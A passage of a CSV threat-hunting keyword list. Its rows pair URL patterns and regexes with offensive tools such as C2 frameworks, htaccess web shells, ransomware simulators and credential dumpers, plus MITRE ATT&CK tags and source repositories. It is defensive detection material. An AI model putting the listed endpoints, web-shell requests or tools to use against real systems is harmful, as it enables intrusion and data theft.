- TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*http*://*/Terminator.sys",".{0,1000}http.{0,1000}\:\/\/.{0,1000}\/Terminator\.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*http*://127.0.0.1:4433*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://127.0.0.1:5556*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*://localhost:4433*",".{0,1000}http.{0,1000}\:\/\/localhost\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" 
"*http*://localhost:5556*",".{0,1000}http.{0,1000}\:\/\/localhost\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*http*:3000/hook.js*",".{0,1000}http.{0,1000}\:3000\/hook\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http*:3200/manjusaka*",".{0,1000}http.{0,1000}\:3200\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*:801/bq1iFEP2*",".{0,1000}http.{0,1000}\:801\/bq1iFEP2.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*127.0.0.1:21802*",".{0,1000}http.{0,1000}127\.0\.0\.1\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:3030*",".{0,1000}http.{0,1000}127\.0\.0\.1\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*http*127.0.0.1:5000*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:50050*",".{0,1000}http.{0,1000}127\.0\.0\.1\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*127.0.0.1:5096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:57230*",".{0,1000}http.{0,1000}127\.0\.0\.1\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*127.0.0.1:7096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.dll*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.exe*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.ps1*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:9631*",".{0,1000}http.{0,1000}127\.0\.0\.1\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:21802*",".{0,1000}http.{0,1000}localhost\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:3030*",".{0,1000}http.{0,1000}localhost\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*http*localhost:5000*",".{0,1000}http.{0,1000}localhost\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:50050*",".{0,1000}http.{0,1000}localhost\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*localhost:5096*",".{0,1000}http.{0,1000}localhost\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:57230*",".{0,1000}http.{0,1000}localhost\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*localhost:7096*",".{0,1000}http.{0,1000}localhost\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http*localhost:9631*",".{0,1000}http.{0,1000}localhost\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*http.title:*BIG-IP®*- Redirect*",".{0,1000}http\.title\:.{0,1000}BIG\-IP\®.{0,1000}\-\sRedirect.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*HTTP/EXEGOL-01.*",".{0,1000}HTTP\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*http://*.oast.fun/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.fun\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.live/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.live\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.me/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.me\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.online/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.online\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.pro/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.pro\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oast.site/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.site\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.oastify.com/*",".{0,1000}http\:\/\/.{0,1000}\.oastify\.com\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","FP Risk","9","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*http://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*http://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" 
"*http://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*http://*/.htaccess?c=cmd*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http://*/.htaccess?c=uname -a*",".{0,1000}http\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http://*/FortyNorth/GetIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/GetIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*http://*/FortyNorth/PostIt*",".{0,1000}http\:\/\/.{0,1000}\/FortyNorth\/PostIt.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*http://*:*/down/*/host.ps1*",".{0,1000}http\:\/\/.{0,1000}\:.{0,1000}\/down\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*http://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}http\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*http://0hRIb4t1fWNPYBVA.net/index.php*",".{0,1000}http\:\/\/0hRIb4t1fWNPYBVA\.net\/index\.php.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*http://10.10.13.37*",".{0,1000}http\:\/\/10\.10\.13\.37.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" 
"*http://101.251.217.210*",".{0,1000}http\:\/\/101\.251\.217\.210.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*http://127.0.0.1/CrossC2*",".{0,1000}http\:\/\/127\.0\.0\.1\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1/FUZZ*",".{0,1000}http\:\/\/127\.0\.0\.1\/FUZZ.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*http://127.0.0.1/handshake.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*http://127.0.0.1/proxy.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/proxy\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" 
"*http://127.0.0.1/Renge_x64.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\/Renge_x64\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*http://127.0.0.1:3000/ui/panel*",".{0,1000}http\:\/\/127\.0\.0\.1\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*http://127.0.0.1:35000*",".{0,1000}http\:\/\/127\.0\.0\.1\:35000.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*http://127.0.0.1:443/aaaaaaaaa*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/aaaaaaaaa.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:443/bbbbbbbbb*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/bbbbbbbbb.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:7444*",".{0,1000}http\:\/\/127\.0\.0\.1\:7444.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*http://127.0.0.1:7474/browser/*",".{0,1000}http\:\/\/127\.0\.0\.1\:7474\/browser\/.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*http://127.0.0.1:8000/1.jpg*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/1\.jpg.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 